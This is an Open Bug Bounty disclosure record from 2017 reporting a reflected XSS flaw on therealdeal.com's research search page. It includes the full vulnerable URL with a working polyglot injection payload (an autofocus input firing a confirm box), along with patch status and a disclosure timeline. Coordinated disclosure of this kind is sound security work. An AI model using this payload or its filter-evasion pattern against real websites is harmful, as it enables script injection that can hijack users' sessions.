therealdeal.com XSS vulnerability

2017-08-24T00:31:00
ID OBB:281760
Type openbugbounty
Reporter eb
Modified 2017-11-22T07:27:00

Description

Vulnerable URL:
https://therealdeal.com/new-research/trd-results/?advanced_search=654464645%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3CInput/Autofocus%20*/;%20Onfocus=confirm(`OPENBUGBOUNTY`)%20//%3E%3CSvg%3E&all_research=on&trd_people=on&trd_company=on&trd_property=on&trd_new_development=on&trd_dealsheet=on&trd_articles=on&trd_reports_rankings=on&trd_industry_reports=on&search_from_nav_bar=Search#

Details:

Description| Value
---|---
Patched:| Verification in progress
Latest check for patch:| 22.11.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 23362
VIP website status:| Yes
Check therealdeal.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 24 August, 2017 00:31 GMT
Vulnerability existence verified and confirmed| 24 August, 2017 06:47 GMT
Generic security notifications sent to website owner| 24 August, 2017 06:47 GMT
Notification sent to subscribers (without technical details)| 24 August, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 22 November, 2017 07:27 GMT